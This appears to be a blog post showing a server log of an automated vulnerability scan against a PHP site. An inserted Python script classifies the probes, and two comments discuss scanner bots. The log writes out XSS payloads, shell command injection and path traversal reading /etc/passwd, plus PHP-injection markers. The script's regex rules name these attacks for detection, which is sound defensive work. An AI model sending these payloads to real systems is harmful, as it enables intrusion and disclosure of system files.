20:11:2009 11:45:01 ==> index.php?sec=comment&mid="
20:11:2009 11:45:01 ==> index.php?sec=alert(1264043128)%3B&id=10
20:11:2009 11:45:02 ==> index.php?sec=comment&id=alert(1309039059)%3B
20:11:2009 11:45:02 ==> index.php?sec=comment&id=alert(990974244)%3B
20:11:2009 11:45:02 ==> index.php?sec=alert(1891836562)%3B&mid=10
20:11:2009 11:45:02 ==> index.php?sec=alert(37731041)%3B&mid=10
20:11:2009 11:45:02 ==> index.php?sec=comment&mid=alert(1319841385)%3B
20:11:2009 11:45:03 ==> index.php?sec=comment&mid=alert(1946218088)%3B
20:11:2009 11:45:04 ==> index.php?sec=comment&id=alert(634206813)%3B
20:11:2009 11:45:05 ==> index.php?sec=cat+/etc/passwd&id=10
20:11:2009 11:45:05 ==> index.php?sec=comment&id=cat+/etc/passwd
20:11:2009 11:45:05 ==> index.php?sec=comment&id=cat+/etc/passwd
20:11:2009 11:45:05 ==> index.php?sec=comment&id=cat+/etc/passwd
20:11:2009 11:45:05 ==> index.php?sec=comment&mid=alert(345690644)%3B
20:11:2009 11:45:06 ==> index.php?sec=cat+/etc/passwd&mid=10
20:11:2009 11:45:06 ==> index.php?sec=cat+/etc/passwd&mid=10
20:11:2009 11:45:06 ==> index.php?sec=comment&mid=cat+/etc/passwd
20:11:2009 11:45:06 ==> index.php?sec=comment&mid=cat+/etc/passwd
20:11:2009 11:45:06 ==> index.php?sec=comment&mid=cat+/etc/passwd
20:11:2009 11:45:10 ==> index.php?sec=comment&id=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:10 ==> index.php?sec=comment&id=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:11 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&mid=10
20:11:2009 11:45:11 ==> index.php?sec=comment&mid=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:11 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&mid=10
20:11:2009 11:45:11 ==> index.php?sec=comment&mid=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:11 ==> index.php?sec=comment&mid=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:13 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&id=10
20:11:2009 11:45:14 ==> index.php?sec=comment&id=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:45 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:46 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:45:46 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:45:46 ==> index.php?sec=comment&id="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:46 ==> index.php?sec=comment&id="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:46 ==> index.php?sec=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:47 ==> index.php?sec=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:47 ==> index.php?sec=%3Bcat+/etc/passwd%3B&id=10
20:11:2009 11:45:47 ==> index.php?sec=comment&id=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:47 ==> index.php?sec=comment&id=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:48 ==> index.php?sec=comment&id=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:48 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:48 ==> index.php?sec=comment&id="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:49 ==> index.php?sec=%3Bcat+/etc/passwd%3B&id=10
20:11:2009 11:45:51 ==> index.php?sec=alert(1647824866)%3B
20:11:2009 11:45:51 ==> index.php?sec=alert(1298423153)%3B
20:11:2009 11:45:51 ==> index.php?sec=alert(124072484)%3B&id=10
20:11:2009 11:45:51 ==> index.php?sec=alert(201133753)%3B&id=10
20:11:2009 11:45:51 ==> index.php?sec=comment&id=alert(2035609503)%3B
20:11:2009 11:45:52 ==> index.php?sec=comment&id=alert(752920738)%3B
20:11:2009 11:45:52 ==> index.php?sec=/etc/passwd
20:11:2009 11:45:52 ==> index.php?sec=/etc/passwd&id=10
20:11:2009 11:45:52 ==> index.php?sec=/etc/passwd&id=10
20:11:2009 11:45:53 ==> index.php?sec=comment&id=/etc/passwd
20:11:2009 11:45:55 ==> index.php?sec=comment&id=alert(657927712)%3B
20:11:2009 11:45:55 ==> index.php?sec=/etc/passwd
20:11:2009 11:45:55 ==> index.php?sec=comment&id=/etc/passwd
20:11:2009 11:45:55 ==> index.php?sec=comment&id=/etc/passwd
20:11:2009 11:45:57 ==> index.php?sec='"
20:11:2009 11:45:58 ==> index.php?sec='"&id=10
20:11:2009 11:46:00 ==> index.php?sec='"
20:11:2009 11:46:12 ==> index.php?sec='"&id=10
20:11:2009 11:46:12 ==> index.php?sec=comment&id='"
20:11:2009 11:46:13 ==> index.php?sec=comment&id='"
20:11:2009 11:46:13 ==> index.php?sec=comment&id='"
20:11:2009 11:46:13 ==> index.php?sec=comment&mid='"
20:11:2009 11:46:13 ==> index.php?sec=comment&mid='"
20:11:2009 11:46:14 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:46:14 ==> index.php?sec=comment&mid="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:46:14 ==> index.php?sec=comment&mid="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:46:14 ==> index.php?sec=comment&mid="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:46:16 ==> index.php?sec='"&mid=10
20:11:2009 11:46:16 ==> index.php?sec='"&mid=10
20:11:2009 11:46:16 ==> index.php?sec=comment&mid='"
20:11:2009 11:46:16 ==> index.php?sec=alert(802769086)%3B&mid=10
20:11:2009 11:46:16 ==> index.php?sec=alert(850699704)%3B&mid=10
20:11:2009 11:46:16 ==> index.php?sec=comment&mid=alert(415408285)%3B
20:11:2009 11:46:17 ==> index.php?sec=comment&mid=alert(608308580)%3B
20:11:2009 11:46:17 ==> index.php?sec=-->alert(1664468178)%3B
20:11:2009 11:46:17 ==> index.php?sec=-->alert(1814423073)%3B
20:11:2009 11:46:17 ==> index.php?sec=-->alert(1930890068)%3B&id=10
20:11:2009 11:46:17 ==> index.php?sec=%3Bcat+/etc/passwd%3B&mid=10
20:11:2009 11:46:17 ==> index.php?sec=%3Bcat+/etc/passwd%3B&mid=10
20:11:2009 11:46:17 ==> index.php?sec=comment&mid=%3Bcat+/etc/passwd%3B
20:11:2009 11:46:18 ==> index.php?sec=comment&mid=%3Bcat+/etc/passwd%3B
20:11:2009 11:46:18 ==> index.php?sec=comment&mid=%3Bcat+/etc/passwd%3B
20:11:2009 11:46:18 ==> index.php?sec=%7Ccat+/etc/passwd
20:11:2009 11:46:18 ==> index.php?sec=%7Ccat+/etc/passwd
20:11:2009 11:46:18 ==> index.php?sec=%7Ccat+/etc/passwd&id=10
20:11:2009 11:46:19 ==> index.php?sec=comment&mid=alert(1200249107)%3B
20:11:2009 11:46:20 ==> index.php?sec=/etc/passwd&mid=10
20:11:2009 11:46:20 ==> index.php?sec=comment&mid=/etc/passwd
20:11:2009 11:46:20 ==> index.php?sec=comment&mid=/etc/passwd
20:11:2009 11:46:20 ==> index.php?sec=comment&mid=/etc/passwd
20:11:2009 11:46:20 ==> index.php?sec=alert(1694625747)%3B&id=10
20:11:2009 11:46:55 ==> index.php?sec=comment&id=\'
20:11:2009 11:46:55 ==> index.php?sec=comment&id=\'
20:11:2009 11:46:55 ==> index.php?sec=%7Ccat+/etc/passwd&id=10
20:11:2009 11:46:56 ==> index.php?sec=comment&id=-->alert(1377482449)%3B
20:11:2009 11:46:56 ==> index.php?sec=%7Ccat+/etc/passwd&mid=10
20:11:2009 11:46:56 ==> index.php?sec=-->alert(1040903300)%3B&mid=10
20:11:2009 11:46:57 ==> index.php?sec=-->alert(1683174040)%3B&mid=10
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=%7Ccat+/etc/passwd
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=%7Ccat+/etc/passwd
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=-->alert(1015227135)%3B
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=-->alert(1687924479)%3B
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=-->alert(961195266)%3B
20:11:2009 11:46:59 ==> index.php?sec=comment&id=-->alert(1199858114)%3B
20:11:2009 11:47:01 ==> index.php?sec=alert(458703142)%3B
20:11:2009 11:47:10 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:31 ==> index.php?sec=t>&id=10
20:11:2009 11:49:31 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:32 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:33 ==> index.php?sec=t>
20:11:2009 11:49:34 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:40 ==> index.php?sec=t>&id=10
20:11:2009 11:49:44 ==> index.php?sec=t>&mid=10
20:11:2009 11:49:44 ==> index.php?sec=t>&mid=10
20:11:2009 11:49:44 ==> index.php?sec=comment&mid=t>
20:11:2009 11:49:44 ==> index.php?sec=comment&mid=t>
20:11:2009 11:49:44 ==> index.php?sec=comment&mid=t>
20:11:2009 11:49:45 ==> index.php?sec=
20:11:2009 11:49:45 ==> index.php?sec=
20:11:2009 11:49:48 ==> index.php?sec=&id=10
20:11:2009 11:49:54 ==> index.php?sec=&id=10
20:11:2009 11:49:54 ==> index.php?sec=comment&id=
20:11:2009 11:49:54 ==> index.php?sec=comment&id=
20:11:2009 11:49:54 ==> index.php?sec=comment&id=
20:11:2009 11:49:54 ==> index.php?sec=&mid=10
20:11:2009 11:49:54 ==> index.php?sec=&mid=10
20:11:2009 11:49:55 ==> index.php?sec=comment&mid=
20:11:2009 11:49:55 ==> index.php?sec=comment&mid=
20:11:2009 11:49:55 ==> index.php?sec=comment&mid=
20:11:2009 11:49:58 ==> index.php?sec=
20:11:2009 11:49:58 ==> index.php?sec=
20:11:2009 11:49:58 ==> index.php?sec=&id=10
20:11:2009 11:49:59 ==> index.php?sec=comment&id=
20:11:2009 11:49:59 ==> index.php?sec=comment&id=
20:11:2009 11:49:59 ==> index.php?sec=comment&id=
20:11:2009 11:50:01 ==> index.php?sec=&id=10
20:11:2009 11:50:08 ==> index.php?sec=comment&mid=
20:11:2009 11:50:09 ==> index.php?sec=&mid=10
20:11:2009 11:50:09 ==> index.php?sec=comment&mid=
20:11:2009 11:50:09 ==> index.php?sec=&mid=10
20:11:2009 11:50:09 ==> index.php?sec=comment&mid=
20:11:2009 11:50:09 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281926425892%29%3B%22%3E
20:11:2009 11:50:09 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28361887675%29%3B%22%3E
20:11:2009 11:50:09 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281529271134%29%3B%22%3E&id=10
20:11:2009 11:50:13 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281814278600%29%3B%22%3E&id=10
20:11:2009 11:50:14 ==> index.php?sec=comment&id=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28372049778%29%3B%22%3E
20:11:2009 11:50:15 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281676866621%29%3B%22%3E&mid=10
20:11:2009 11:50:16 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281268694325%29%3B%22%3E&mid=10
20:11:2009 11:50:16 ==> index.php?sec=comment&id=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281588223727%29%3B%22%3E
20:11:2009 11:50:16 ==> index.php?sec=comment&mid=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%282090188884%29%3B%22%3E
20:11:2009 11:50:17 ==> index.php?sec=comment&mid=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281422186411%29%3B%22%3E
20:11:2009 11:50:17 ==> index.php?sec=comment&id=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28700947120%29%3B%22%3E
20:11:2009 11:50:25 ==> index.php?sec=comment&mid=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281901972496%29%3B%22%3E
20:11:2009 11:50:30 ==> index.php?sec=&id=10
20:11:2009 11:50:30 ==> index.php?sec=
20:11:2009 11:50:32 ==> index.php?sec=
20:11:2009 11:50:32 ==> index.php?sec=&id=10
20:11:2009 11:50:32 ==> index.php?sec=comment&id=
20:11:2009 11:50:33 ==> index.php?sec=comment&id=
20:11:2009 11:50:33 ==> index.php?sec=comment&id=
20:11:2009 11:50:38 ==> index.php?sec=&mid=10
20:11:2009 11:50:38 ==> index.php?sec=&mid=10
20:11:2009 11:50:38 ==> index.php?sec=comment&mid=
20:11:2009 11:50:38 ==> index.php?sec=
20:11:2009 11:50:41 ==> index.php?sec=comment&mid=
20:11:2009 11:50:41 ==> index.php?sec=
20:11:2009 11:51:07 ==> index.php?sec=
20:11:2009 11:51:07 ==> index.php?sec=comment&id=
20:11:2009 11:51:08 ==> index.php?sec=comment&id=
20:11:2009 11:51:08 ==> index.php?sec=comment&id=
20:11:2009 11:51:10 ==> index.php?sec=&id=10
20:11:2009 11:51:10 ==> index.php?sec=&id=10
20:11:2009 11:51:13 ==> index.php?sec=comment&mid=
20:11:2009 11:51:13 ==> index.php?sec=
20:11:2009 11:51:13 ==> index.php?sec=comment&mid=
20:11:2009 11:51:13 ==> index.php?sec=
20:11:2009 11:51:13 ==> index.php?sec=&mid=10
20:11:2009 11:51:13 ==> index.php?sec=comment&mid=
20:11:2009 11:51:16 ==> index.php?sec=&mid=10
20:11:2009 11:51:16 ==> index.php?sec=&id=10
20:11:2009 11:51:18 ==> index.php?sec=comment&id=
20:11:2009 11:51:18 ==> index.php?sec=&mid=10
20:11:2009 11:51:18 ==> index.php?sec=&id=10
20:11:2009 11:51:18 ==> index.php?sec=comment&id=
20:11:2009 11:51:18 ==> index.php?sec=&mid=10
20:11:2009 11:51:19 ==> index.php?sec=comment&mid=
20:11:2009 11:51:19 ==> index.php?sec=comment&mid=
20:11:2009 11:51:21 ==> index.php?sec=comment&id=
20:11:2009 11:51:21 ==> index.php?sec=comment&mid=
20:11:2009 11:51:32 ==> index.php?sec=
20:11:2009 11:51:32 ==> index.php?sec=
20:11:2009 11:51:32 ==> index.php?sec=comment&id=
20:11:2009 11:51:32 ==> index.php?sec=comment&id=
20:11:2009 11:51:32 ==> index.php?sec=&id=10
20:11:2009 11:51:33 ==> index.php?sec=&id=10
20:11:2009 11:51:35 ==> index.php?sec=comment&id=
20:11:2009 11:51:40 ==> index.php?sec=&mid=10
20:11:2009 11:51:40 ==> index.php?sec=&mid=10
20:11:2009 11:51:41 ==> index.php?sec=comment&mid=
20:11:2009 11:51:42 ==> index.php?sec=comment&mid=
20:11:2009 11:51:42 ==> index.php?sec=
20:11:2009 11:51:42 ==> index.php?sec=&id=10
20:11:2009 11:51:43 ==> index.php?sec=comment&mid=
20:11:2009 11:51:45 ==> index.php?sec=
20:11:2009 11:51:47 ==> index.php?sec=comment&id=
20:11:2009 11:51:47 ==> index.php?sec=comment&id=
20:11:2009 11:51:47 ==> index.php?sec=comment&id=
20:11:2009 11:51:48 ==> index.php?sec=comment&mid=
20:11:2009 11:51:48 ==> index.php?sec=&mid=10
20:11:2009 11:51:48 ==> index.php?sec=comment&mid=
20:11:2009 11:51:51 ==> index.php?sec=&id=10
20:11:2009 11:51:51 ==> index.php?sec=comment&mid=
20:11:2009 11:51:51 ==> index.php?sec=&mid=10
20:11:2009 11:51:56 ==> index.php?sec=
20:11:2009 11:51:56 ==> index.php?sec=&id=10
20:11:2009 11:51:56 ==> index.php?sec=comment&id=
20:11:2009 11:51:56 ==> index.php?sec=comment&id=
20:11:2009 11:51:57 ==> index.php?sec=comment&id=
20:11:2009 11:52:02 ==> index.php?sec=&id=10
20:11:2009 11:52:04 ==> index.php?sec=
20:11:2009 11:52:18 ==> index.php?sec=&mid=10
20:11:2009 11:52:18 ==> index.php?sec=&mid=10
20:11:2009 11:52:18 ==> index.php?sec=comment&mid=
20:11:2009 11:52:18 ==> index.php?sec=comment&mid=
20:11:2009 11:52:19 ==> index.php?sec='+style='background:url(JaVaScRiPt:alert(683901356))'+invalidparam='
20:11:2009 11:52:19 ==> index.php?sec='+style='background:url(JaVaScRiPt:alert(202537566))'+invalidparam='
20:11:2009 11:52:19 ==> index.php?sec='+style='background:url(JaVaScRiPt:alert(141299017))'+invalidparam='&id=10
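As an added illustration, not code from the post or its log system: a small Python script that parses lines in this log's format (DD:MM:YYYY HH:MM:SS ==> request), URL-decodes each query parameter and labels the probe types that appear above (the acunetix_wvs_security_test marker, `;`/`|` command injection, /etc/passwd reads, alert()/img XSS, bare quotes), then flags the scanner-like burst the post describes. The sample lines and the rule names are constructed for this example; the one-minute burst threshold is an assumption.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit
# Constructed sample lines in the post's own log format: DD:MM:YYYY HH:MM:SS ==> request
SAMPLE_LOG = [
    '20:11:2009 11:46:14 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10',
    '20:11:2009 11:46:17 ==> index.php?sec=%3Bcat+/etc/passwd%3B&mid=10',
    '20:11:2009 11:46:18 ==> index.php?sec=%7Ccat+/etc/passwd',
    '20:11:2009 11:46:20 ==> index.php?sec=comment&mid=/etc/passwd',
    "20:11:2009 11:46:55 ==> index.php?sec=comment&id=\\'",
    '20:11:2009 11:50:09 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281926425892%29%3B%22%3E',
    '20:11:2009 11:52:20 ==> index.php?sec=comment&id=10',
]
LINE_RE = re.compile(r'^(\d{2}:\d{2}:\d{4} \d{2}:\d{2}:\d{2}) ==> (\S+)$')
RULES = [  # most severe first; the first rule that matches a decoded value wins
    ('scanner_marker', re.compile(r'acunetix_wvs_security_test', re.I)),   # Acunetix WVS test string
    ('command_injection', re.compile(r'^[;|]\s*\w+')),                     # ;cat ... / |cat ...
    ('file_disclosure', re.compile(r'/etc/passwd')),                        # bare path in a parameter
    ('xss', re.compile(r'alert\s*\(|<img|javascript:|-->', re.I)),         # script/tag probes
    ('quote_probe', re.compile(r'^[\\\'"]+$')),                             # ' " \' '" (SQL/quoting)
]
SEVERITY = [name for name, _ in RULES] + ['benign']

def classify_value(value):
    """Label one URL-decoded parameter value; 'benign' when no rule matches."""
    for label, rx in RULES:
        if rx.search(value):
            return label
    return 'benign'

def parse_line(line):
    """Return (timestamp, request, most severe label), or None for a line outside the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), '%d:%m:%Y %H:%M:%S')
    # parse_qsl already URL-decodes; keep_blank_values so an emptied payload (sec=) is still counted
    pairs = parse_qsl(urlsplit(m.group(2)).query, keep_blank_values=True)
    labels = [classify_value(v) for _, v in pairs] or ['benign']
    return ts, m.group(2), min(labels, key=SEVERITY.index)

def summarize(lines):
    """Count labels and flag a scanner-like burst: five hostile requests within 60 seconds (assumed threshold)."""
    parsed = [r for r in map(parse_line, lines) if r]
    counts = Counter(label for _, _, label in parsed)
    hostile = [ts for ts, _, label in parsed if label != 'benign']
    burst = any((hostile[i + 4] - hostile[i]).total_seconds() <= 60
                for i in range(len(hostile) - 4))
    return counts, burst
```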

Filed under: Ordan-burdan

2 Comments

  • 1. ALoR  |  November 27, 2009 at 16:08

    :) Yes, it's a program; it checked for XSS and SQL INJECTION :) All of them failed. I think there are bots on the net that automatically check sites for XSS and SQL. Otherwise, doing this many things one by one by hand would be hard :) Or some Azerbaijani did it with a program through a proxy IP. :) Interesting, thanks. Attempts like this happen on http://www.azdefacers.org more than 100 times a day; I hadn't looked at the logs for a long time, and when I did, more than 20 thousand attempts had been recorded :)

  • 2. Eldar  |  December 10, 2009 at 16:44

    I once saw the program from the acunetix site on some website and downloaded it, but since the usage instructions were given wrong, I decided the program was useless and deleted it :(
    Besides, I'm on dial-up and have no desire to download the same thing again.
